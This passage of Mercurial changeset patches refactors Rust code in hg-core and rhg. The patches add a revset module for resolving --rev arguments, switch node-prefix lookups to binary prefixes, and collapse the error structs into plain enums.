assert_eq!(nt.masked_readonly_blocks(), 2); Ok(()) } @@ -903,14 +874,14 @@ &self, prefix: &str, ) -> Result<Option<Revision>, NodeMapError> { - self.nt.find_hex(&self.index, prefix) + self.nt.find_bin(&self.index, hex(prefix)) } fn unique_prefix_len_hex( &self, prefix: &str, ) -> Result<Option<usize>, NodeMapError> { - self.nt.unique_prefix_len_hex(&self.index, prefix) + self.nt.unique_prefix_len_bin(&self.index, hex(prefix)) } /// Drain `added` and restart a new one diff --git a/rust/hg-cpython/src/revlog.rs b/rust/hg-cpython/src/revlog.rs --- a/rust/hg-cpython/src/revlog.rs +++ b/rust/hg-cpython/src/revlog.rs @@ -17,7 +17,7 @@ }; use hg::{ nodemap::{Block, NodeMapError, NodeTree}, - revlog::{nodemap::NodeMap, RevlogIndex}, + revlog::{nodemap::NodeMap, NodePrefix, RevlogIndex}, Revision, }; use std::cell::RefCell; @@ -107,7 +107,9 @@ String::from_utf8_lossy(node.data(py)).to_string() }; - nt.find_hex(idx, &node_as_string) + let prefix = NodePrefix::from_hex(&node_as_string).map_err(|_| PyErr::new::<ValueError, _>(py, "Invalid node or prefix"))?; + + nt.find_bin(idx, prefix) // TODO make an inner API returning the node directly .map(|opt| opt.map( |rev| PyBytes::new(py, idx.node(rev).unwrap().as_bytes()))) @@ -468,9 +470,6 @@ match err { NodeMapError::MultipleResults => revlog_error(py), NodeMapError::RevisionNotInIndex(r) => rev_not_in_index(py, r), - NodeMapError::InvalidNodePrefix => { - PyErr::new::<ValueError, _>(py, "Invalid node or prefix") - } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611682306 -3600 # Tue Jan 26 18:31:46 2021 +0100 # Node ID 4b381dbbf8b7a42e7f6e7e7d68e04886370d8aa7 # Parent 18a261b11b202abc79f765c360bd76d204ec9fef rhg: centralize parsing of `--rev` CLI arguments This new module will be the place to implement more of the revset language when we do so. Differential Revision: https://phab.mercurial-scm.org/D9873 diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -28,6 +28,7 @@ pub use revlog::*; pub mod config; pub mod operations; +pub mod revset; pub mod utils; use crate::utils::hg_path::{HgPathBuf, HgPathError}; diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -15,8 +15,6 @@ use crate::revlog::revlog::Revlog; use crate::revlog::revlog::RevlogError; use crate::revlog::Node; -use crate::revlog::NodePrefix; -use crate::revlog::Revision; use crate::utils::files::get_path_from_bytes; use crate::utils::hg_path::{HgPath, HgPathBuf}; @@ -77,23 +75,15 @@ /// * `files`: The files to output. pub fn cat( repo: &Repo, - rev: &str, + revset: &str, files: &[HgPathBuf], ) -> Result<Vec<u8>, CatRevError> { + let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; - - let changelog_entry = match rev.parse::<Revision>() { - Ok(rev) => changelog.get_rev(rev)?, - _ => { - let changelog_node = NodePrefix::from_hex(&rev) - .map_err(|_| CatRevErrorKind::InvalidRevision)?; - changelog.get_node(changelog_node)? - } - }; + let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; - let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -7,8 +7,6 @@ use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefix; -use crate::revlog::Revision; /// Kind of data to debug #[derive(Debug, Copy, Clone)] @@ -79,7 +77,7 @@ /// Dump the contents data of a revision. pub fn debug_data( repo: &Repo, - rev: &str, + revset: &str, kind: DebugDataKind, ) -> Result<Vec<u8>, DebugDataError> { let index_file = match kind { @@ -87,16 +85,8 @@ DebugDataKind::Manifest => "00manifest.i", }; let revlog = Revlog::open(repo, index_file, None)?; - - let data = match rev.parse::<Revision>() { - Ok(rev) => revlog.get_rev_data(rev)?, - _ => { - let node = NodePrefix::from_hex(&rev) - .map_err(|_| DebugDataErrorKind::InvalidRevision)?; - let rev = revlog.get_node_rev(node)?; - revlog.get_rev_data(rev)? - } - }; - + let rev = + crate::revset::resolve_rev_number_or_hex_prefix(revset, &revlog)?; + let data = revlog.get_rev_data(rev)?; Ok(data) } diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -9,9 +9,8 @@ use crate::repo::Repo; use crate::revlog::changelog::Changelog; use crate::revlog::manifest::{Manifest, ManifestEntry}; -use crate::revlog::node::{Node, NodePrefix}; +use crate::revlog::node::Node; use crate::revlog::revlog::RevlogError; -use crate::revlog::Revision; use crate::utils::hg_path::HgPath; use crate::{DirstateParseError, EntryState}; use rayon::prelude::*; @@ -137,19 +136,12 @@ /// List files under Mercurial control at a given revision. pub fn list_rev_tracked_files( repo: &Repo, - rev: &str, + revset: &str, ) -> Result<FilesForRev, ListRevTrackedFilesError> { + let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; - - let changelog_entry = match rev.parse::<Revision>() { - Ok(rev) => changelog.get_rev(rev)?, - _ => { - let changelog_node = NodePrefix::from_hex(&rev) - .or(Err(ListRevTrackedFilesErrorKind::InvalidRevision))?; - changelog.get_node(changelog_node)? - } - }; + let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) .or(Err(ListRevTrackedFilesErrorKind::CorruptedRevlog))?; let manifest_entry = manifest.get_node(manifest_node.into())?; diff --git a/rust/hg-core/src/revlog/changelog.rs b/rust/hg-core/src/revlog/changelog.rs --- a/rust/hg-core/src/revlog/changelog.rs +++ b/rust/hg-core/src/revlog/changelog.rs @@ -6,7 +6,7 @@ /// A specialized `Revlog` to work with `changelog` data format. pub struct Changelog { /// The generic `revlog` format. - revlog: Revlog, + pub(crate) revlog: Revlog, } impl Changelog { diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -150,6 +150,11 @@ found_by_prefix.ok_or(RevlogError::InvalidRevision) } + /// Returns whether the given revision exists in this revlog. + pub fn has_rev(&self, rev: Revision) -> bool { + self.index.get_entry(rev).is_some() + } + /// Return the full data associated to a revision. /// /// All entries required to build the final data out of deltas will be diff --git a/rust/hg-core/src/revset.rs b/rust/hg-core/src/revset.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/revset.rs @@ -0,0 +1,53 @@ +//! The revset query language +//! +//! <https://www.mercurial-scm.org/repo/hg/help/revsets> + +use crate::repo::Repo; +use crate::revlog::changelog::Changelog; +use crate::revlog::revlog::{Revlog, RevlogError}; +use crate::revlog::NodePrefix; +use crate::revlog::{Revision, NULL_REVISION}; + +/// Resolve a query string into a single revision. +/// +/// Only some of the revset language is implemented yet. +pub fn resolve_single( + input: &str, + repo: &Repo, +) -> Result<Revision, RevlogError> { + let changelog = Changelog::open(repo)?; + + match resolve_rev_number_or_hex_prefix(input, &changelog.revlog) { + Err(RevlogError::InvalidRevision) => {} // Try other syntax + result => return result, + } + + if input == "null" { + return Ok(NULL_REVISION); + } + + // TODO: support for the rest of the language here. + + Err(RevlogError::InvalidRevision) +} + +/// Resolve the small subset of the language suitable for revlogs other than +/// the changelog, such as in `hg debugdata --manifest` CLI argument. +/// +/// * A non-negative decimal integer for a revision number, or +/// * An hexadecimal string, for the unique node ID that starts with this +/// prefix +pub fn resolve_rev_number_or_hex_prefix( + input: &str, + revlog: &Revlog, +) -> Result<Revision, RevlogError> { + if let Ok(integer) = input.parse::<i32>() { + if integer >= 0 && revlog.has_rev(integer) { + return Ok(integer); + } + } + if let Ok(prefix) = NodePrefix::from_hex(input) { + return revlog.get_node_rev(prefix); + } + Err(RevlogError::InvalidRevision) +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611684444 -3600 # Tue Jan 26 19:07:24 2021 +0100 # Node ID 3e2d539d0d1a6390677c2d18bb8aa4fe241a8ae2 # Parent 4b381dbbf8b7a42e7f6e7e7d68e04886370d8aa7 rust: remove `FooError` structs with only `kind: FooErrorKind` enum field Use the enum directly as `FooError` instead. Differential Revision: https://phab.mercurial-scm.org/D9874 diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -20,9 +20,9 @@ const METADATA_DELIMITER: [u8; 2] = [b'\x01', b'\n']; -/// Kind of error encountered by `CatRev` +/// Error type for `cat` #[derive(Debug)] -pub enum CatRevErrorKind { +pub enum CatRevError { /// Error when reading a `revlog` file. IoError(std::io::Error), /// The revision has not been found. @@ -37,34 +37,20 @@ UnknowRevlogDataFormat(u8), } -/// A `CatRev` error -#[derive(Debug)] -pub struct CatRevError { - /// Kind of error encountered by `CatRev` - pub kind: CatRevErrorKind, -} - -impl From<CatRevErrorKind> for CatRevError { - fn from(kind: CatRevErrorKind) -> Self { - CatRevError { kind } - } -} - impl From<RevlogError> for CatRevError { fn from(err: RevlogError) -> Self { match err { - RevlogError::IoError(err) => CatRevErrorKind::IoError(err), + RevlogError::IoError(err) => CatRevError::IoError(err), RevlogError::UnsuportedVersion(version) => { - CatRevErrorKind::UnsuportedRevlogVersion(version) + CatRevError::UnsuportedRevlogVersion(version) } - RevlogError::InvalidRevision => CatRevErrorKind::InvalidRevision, - RevlogError::AmbiguousPrefix => CatRevErrorKind::AmbiguousPrefix, - RevlogError::Corrupted => CatRevErrorKind::CorruptedRevlog, + RevlogError::InvalidRevision => CatRevError::InvalidRevision, + RevlogError::AmbiguousPrefix => CatRevError::AmbiguousPrefix, + RevlogError::Corrupted => CatRevError::CorruptedRevlog, RevlogError::UnknowDataFormat(format) => { - CatRevErrorKind::UnknowRevlogDataFormat(format) + CatRevError::UnknowRevlogDataFormat(format) } } - .into() } } @@ -83,7 +69,7 @@ let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; + .map_err(|_| CatRevError::CorruptedRevlog)?; let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; @@ -96,7 +82,7 @@ let file_log = Revlog::open(repo, &index_path, Some(&data_path))?; let file_node = Node::from_hex(node_bytes) - .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; + .map_err(|_| CatRevError::CorruptedRevlog)?; let file_rev = file_log.get_node_rev(file_node.into())?; let data = file_log.get_rev_data(file_rev)?; if data.starts_with(&METADATA_DELIMITER) { diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -15,9 +15,9 @@ Manifest, } -/// Kind of error encountered by DebugData +/// Error type for `debug_data` #[derive(Debug)] -pub enum DebugDataErrorKind { +pub enum DebugDataError { /// Error when reading a `revlog` file. IoError(std::io::Error), /// The revision has not been found. @@ -32,45 +32,26 @@ UnknowRevlogDataFormat(u8), } -/// A DebugData error -#[derive(Debug)] -pub struct DebugDataError { - /// Kind of error encountered by DebugData - pub kind: DebugDataErrorKind, -} - -impl From<DebugDataErrorKind> for DebugDataError { - fn from(kind: DebugDataErrorKind) -> Self { - DebugDataError { kind } - } -} - impl From<std::io::Error> for DebugDataError { fn from(err: std::io::Error) -> Self { - let kind = DebugDataErrorKind::IoError(err); - DebugDataError { kind } + DebugDataError::IoError(err) } } impl From<RevlogError> for DebugDataError { fn from(err: RevlogError) -> Self { match err { - RevlogError::IoError(err) => DebugDataErrorKind::IoError(err), + RevlogError::IoError(err) => DebugDataError::IoError(err), RevlogError::UnsuportedVersion(version) => { - DebugDataErrorKind::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => { - DebugDataErrorKind::InvalidRevision + DebugDataError::UnsuportedRevlogVersion(version) } - RevlogError::AmbiguousPrefix => { - DebugDataErrorKind::AmbiguousPrefix - } - RevlogError::Corrupted => DebugDataErrorKind::CorruptedRevlog, + RevlogError::InvalidRevision => DebugDataError::InvalidRevision, + RevlogError::AmbiguousPrefix => DebugDataError::AmbiguousPrefix, + RevlogError::Corrupted => DebugDataError::CorruptedRevlog, RevlogError::UnknowDataFormat(format) => { - DebugDataErrorKind::UnknowRevlogDataFormat(format) + DebugDataError::UnknowRevlogDataFormat(format) } } - .into() } } diff --git a/rust/hg-core/src/operations/find_root.rs b/rust/hg-core/src/operations/find_root.rs --- a/rust/hg-core/src/operations/find_root.rs +++ b/rust/hg-core/src/operations/find_root.rs @@ -1,9 +1,8 @@ -use std::fmt; use std::path::{Path, PathBuf}; -/// Kind of error encoutered by FindRoot +/// Error type for `find_root` #[derive(Debug)] -pub enum FindRootErrorKind { +pub enum FindRootError { /// Root of the repository has not been found /// Contains the current directory used by FindRoot RootNotFound(PathBuf), @@ -12,28 +11,12 @@ GetCurrentDirError(std::io::Error), } -/// A FindRoot error -#[derive(Debug)] -pub struct FindRootError { - /// Kind of error encoutered by FindRoot - pub kind: FindRootErrorKind, -} - -impl std::error::Error for FindRootError {} - -impl fmt::Display for FindRootError { - fn fmt(&self, _f: &mut fmt::Formatter<'_>) -> fmt::Result { - unimplemented!() - } -} - /// Find the root of the repository /// by searching for a .hg directory in the process’ current directory and its /// ancestors pub fn find_root() -> Result<PathBuf, FindRootError> { - let current_dir = std::env::current_dir().map_err(|e| FindRootError { - kind: FindRootErrorKind::GetCurrentDirError(e), - })?; + let current_dir = std::env::current_dir() + .map_err(|e| FindRootError::GetCurrentDirError(e))?; Ok(find_root_from_path(¤t_dir)?.into()) } @@ -48,9 +31,7 @@ return Ok(ancestor); } } - Err(FindRootError { - kind: FindRootErrorKind::RootNotFound(start.into()), - }) + Err(FindRootError::RootNotFound(start.into())) } #[cfg(test)] @@ -68,10 +49,8 @@ // TODO do something better assert!(match err { - FindRootError { kind } => match kind { - FindRootErrorKind::RootNotFound(p) => p == path.to_path_buf(), - _ => false, - }, + FindRootError::RootNotFound(p) => p == path.to_path_buf(), + _ => false, }) } diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -16,34 +16,18 @@ use rayon::prelude::*; use std::convert::From; -/// Kind of error encountered by `ListDirstateTrackedFiles` +/// Error type for `Dirstate` methods #[derive(Debug)] -pub enum ListDirstateTrackedFilesErrorKind { +pub enum ListDirstateTrackedFilesError { /// Error when reading the `dirstate` file IoError(std::io::Error), /// Error when parsing the `dirstate` file ParseError(DirstateParseError), } -/// A `ListDirstateTrackedFiles` error -#[derive(Debug)] -pub struct ListDirstateTrackedFilesError { - /// Kind of error encountered by `ListDirstateTrackedFiles` - pub kind: ListDirstateTrackedFilesErrorKind, -} - -impl From<ListDirstateTrackedFilesErrorKind> - for ListDirstateTrackedFilesError -{ - fn from(kind: ListDirstateTrackedFilesErrorKind) -> Self { - ListDirstateTrackedFilesError { kind } - } -} - impl From<std::io::Error> for ListDirstateTrackedFilesError { fn from(err: std::io::Error) -> Self { - let kind = ListDirstateTrackedFilesErrorKind::IoError(err); - ListDirstateTrackedFilesError { kind } + ListDirstateTrackedFilesError::IoError(err) } } @@ -64,7 +48,7 @@ &self, ) -> Result<Vec<&HgPath>, ListDirstateTrackedFilesError> { let (_, entries, _) = parse_dirstate(&self.content) - .map_err(ListDirstateTrackedFilesErrorKind::ParseError)?; + .map_err(ListDirstateTrackedFilesError::ParseError)?; let mut files: Vec<&HgPath> = entries .into_iter() .filter_map(|(path, entry)| match entry.state { @@ -77,9 +61,9 @@ } } -/// Kind of error encountered by `ListRevTrackedFiles` +/// Error type `list_rev_tracked_files` #[derive(Debug)] -pub enum ListRevTrackedFilesErrorKind { +pub enum ListRevTrackedFilesError { /// Error when reading a `revlog` file. IoError(std::io::Error), /// The revision has not been found. @@ -94,42 +78,28 @@ UnknowRevlogDataFormat(u8), } -/// A `ListRevTrackedFiles` error -#[derive(Debug)] -pub struct ListRevTrackedFilesError { - /// Kind of error encountered by `ListRevTrackedFiles` - pub kind: ListRevTrackedFilesErrorKind, -} - -impl From<ListRevTrackedFilesErrorKind> for ListRevTrackedFilesError { - fn from(kind: ListRevTrackedFilesErrorKind) -> Self { - ListRevTrackedFilesError { kind } - } -} - impl From<RevlogError> for ListRevTrackedFilesError { fn from(err: RevlogError) -> Self { match err { RevlogError::IoError(err) => { - ListRevTrackedFilesErrorKind::IoError(err) + ListRevTrackedFilesError::IoError(err) } RevlogError::UnsuportedVersion(version) => { - ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version) + ListRevTrackedFilesError::UnsuportedRevlogVersion(version) } RevlogError::InvalidRevision => { - ListRevTrackedFilesErrorKind::InvalidRevision + ListRevTrackedFilesError::InvalidRevision } RevlogError::AmbiguousPrefix => { - ListRevTrackedFilesErrorKind::AmbiguousPrefix + ListRevTrackedFilesError::AmbiguousPrefix } RevlogError::Corrupted => { - ListRevTrackedFilesErrorKind::CorruptedRevlog + ListRevTrackedFilesError::CorruptedRevlog } RevlogError::UnknowDataFormat(format) => { - ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format) + ListRevTrackedFilesError::UnknowRevlogDataFormat(format) } } - .into() } } @@ -143,7 +113,7 @@ let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .or(Err(ListRevTrackedFilesErrorKind::CorruptedRevlog))?; + .or(Err(ListRevTrackedFilesError::CorruptedRevlog))?; let manifest_entry = manifest.get_node(manifest_node.into())?; Ok(FilesForRev(manifest_entry)) } diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -7,17 +7,10 @@ mod dirstate_status; mod find_root; mod list_tracked_files; -pub use cat::{cat, CatRevError, CatRevErrorKind}; -pub use debugdata::{ - debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind, -}; -pub use find_root::{ - find_root, find_root_from_path, FindRootError, FindRootErrorKind, -}; +pub use cat::{cat, CatRevError}; +pub use debugdata::{debug_data, DebugDataError, DebugDataKind}; +pub use find_root::{find_root, find_root_from_path, FindRootError}; pub use list_tracked_files::{ list_rev_tracked_files, FilesForRev, ListRevTrackedFilesError, - ListRevTrackedFilesErrorKind, }; -pub use list_tracked_files::{ - Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind, -}; +pub use list_tracked_files::{Dirstate, ListDirstateTrackedFilesError}; diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,8 +1,8 @@ use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; +use crate::error::CommandError; use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{cat, CatRevError, CatRevErrorKind}; +use hg::operations::{cat, CatRevError}; use hg::repo::Repo; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; @@ -34,16 +34,16 @@ let repo = Repo::find()?; repo.check_requirements()?; let cwd = std::env::current_dir() - .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?; + .or_else(|e| Err(CommandError::CurrentDirNotFound(e)))?; let mut files = vec![]; for file in self.files.iter() { let normalized = cwd.join(&file); let stripped = normalized .strip_prefix(&repo.working_directory_path()) - .or(Err(CommandErrorKind::Abort(None)))?; + .or(Err(CommandError::Abort(None)))?; let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) - .or(Err(CommandErrorKind::Abort(None)))?; + .or(Err(CommandError::Abort(None)))?; files.push(hg_file); } @@ -53,53 +53,51 @@ .map_err(|e| map_rev_error(rev, e))?; self.display(ui, &data) } - None => Err(CommandErrorKind::Unimplemented.into()), + None => Err(CommandError::Unimplemented.into()), } } } -/// Convert `CatRevErrorKind` to `CommandError` +/// Convert `CatRevError` to `CommandError` fn map_rev_error(rev: &str, err: CatRevError) -> CommandError { - CommandError { - kind: match err.kind { - CatRevErrorKind::IoError(err) => CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - CatRevErrorKind::InvalidRevision => CommandErrorKind::Abort(Some( + match err { + CatRevError::IoError(err) => CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )), + CatRevError::InvalidRevision => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: invalid revision identifier {}\n", + rev + )) + .into(), + )), + CatRevError::AmbiguousPrefix => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier {}\n", + rev + )) + .into(), + )), + CatRevError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )), - CatRevErrorKind::AmbiguousPrefix => CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev + "abort: unsupported revlog version {}\n", + version )) .into(), - )), - CatRevErrorKind::UnsuportedRevlogVersion(version) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), + )) + } + CatRevError::CorruptedRevlog => { + CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + CatRevError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unknow revlog dataformat {:?}\n", + format )) - } - CatRevErrorKind::CorruptedRevlog => CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), - )), - CatRevErrorKind::UnknowRevlogDataFormat(format) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - }, + .into(), + )) + } } } diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,10 +1,8 @@ use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; +use crate::error::CommandError; use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{ - debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind, -}; +use hg::operations::{debug_data, DebugDataError, DebugDataKind}; use hg::repo::Repo; use micro_timer::timed; @@ -40,52 +38,44 @@ /// Convert operation errors to command errors fn to_command_error(rev: &str, err: DebugDataError) -> CommandError { - match err.kind { - DebugDataErrorKind::IoError(err) => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - }, - DebugDataErrorKind::InvalidRevision => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier{}\n", - rev - )) - .into(), - )), - }, - DebugDataErrorKind::AmbiguousPrefix => CommandError { - kind: CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier{}\n", - rev - )) - .into(), - )), - }, - DebugDataErrorKind::UnsuportedRevlogVersion(version) => CommandError { - kind: CommandErrorKind::Abort(Some( + match err { + DebugDataError::IoError(err) => CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )), + DebugDataError::InvalidRevision => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: invalid revision identifier{}\n", + rev + )) + .into(), + )), + DebugDataError::AmbiguousPrefix => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier{}\n", + rev + )) + .into(), + )), + DebugDataError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( utf8_to_local(&format!( "abort: unsupported revlog version {}\n", version )) .into(), - )), - }, - DebugDataErrorKind::CorruptedRevlog => CommandError { - kind: CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), - )), - }, - DebugDataErrorKind::UnknowRevlogDataFormat(format) => CommandError { - kind: CommandErrorKind::Abort(Some( + )) + } + DebugDataError::CorruptedRevlog => { + CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + DebugDataError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( utf8_to_local(&format!( "abort: unknow revlog dataformat {:?}\n", format )) .into(), - )), - }, + )) + } } } diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,14 +1,9 @@ use crate::commands::Command; -use crate::error::{CommandError, CommandErrorKind}; +use crate::error::CommandError; use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{ - list_rev_tracked_files, ListRevTrackedFilesError, - ListRevTrackedFilesErrorKind, -}; -use hg::operations::{ - Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind, -}; +use hg::operations::{list_rev_tracked_files, ListRevTrackedFilesError}; +use hg::operations::{Dirstate, ListDirstateTrackedFilesError}; use hg::repo::Repo; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; @@ -35,7 +30,7 @@ files: impl IntoIterator<Item = &'a HgPath>, ) -> Result<(), CommandError> { let cwd = std::env::current_dir() - .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?; + .or_else(|e| Err(CommandError::CurrentDirNotFound(e)))?; let rooted_cwd = cwd .strip_prefix(repo.working_directory_path()) .expect("cwd was already checked within the repository"); @@ -68,75 +63,65 @@ } } -/// Convert `ListRevTrackedFilesErrorKind` to `CommandError` +/// Convert `ListRevTrackedFilesError` to `CommandError` fn map_rev_error(rev: &str, err: ListRevTrackedFilesError) -> CommandError { - CommandError { - kind: match err.kind { - ListRevTrackedFilesErrorKind::IoError(err) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), + match err { + ListRevTrackedFilesError::IoError(err) => CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )), + ListRevTrackedFilesError::InvalidRevision => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: invalid revision identifier {}\n", + rev )) - } - ListRevTrackedFilesErrorKind::InvalidRevision => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesErrorKind::AmbiguousPrefix => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), + .into(), + )) + } + ListRevTrackedFilesError::AmbiguousPrefix => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier {}\n", + rev )) - } - ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), + .into(), + )) + } + ListRevTrackedFilesError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unsupported revlog version {}\n", + version )) - } - ListRevTrackedFilesErrorKind::CorruptedRevlog => { - CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), + .into(), + )) + } + ListRevTrackedFilesError::CorruptedRevlog => { + CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + ListRevTrackedFilesError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unknow revlog dataformat {:?}\n", + format )) - } - ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - }, + .into(), + )) + } } } /// Convert `ListDirstateTrackedFilesError` to `CommandError` fn map_dirstate_error(err: ListDirstateTrackedFilesError) -> CommandError { - CommandError { - kind: match err.kind { - ListDirstateTrackedFilesErrorKind::IoError(err) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )) - } - ListDirstateTrackedFilesErrorKind::ParseError(_) => { - CommandErrorKind::Abort(Some( - // TODO find a better error message - b"abort: parse error\n".to_vec(), - )) - } - }, + match err { + ListDirstateTrackedFilesError::IoError(err) => CommandError::Abort( + Some(utf8_to_local(&format!("abort: {}\n", err)).into()), + ), + ListDirstateTrackedFilesError::ParseError(_) => { + CommandError::Abort(Some( + // TODO find a better error message + b"abort: parse error\n".to_vec(), + )) + } } } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,7 +1,7 @@ use crate::exitcode; use crate::ui::UiError; use format_bytes::format_bytes; -use hg::operations::{FindRootError, FindRootErrorKind}; +use hg::operations::FindRootError; use hg::requirements::RequirementsError; use hg::utils::files::get_bytes_from_path; use std::convert::From; @@ -9,7 +9,7 @@ /// The kind of command error #[derive(Debug)] -pub enum CommandErrorKind { 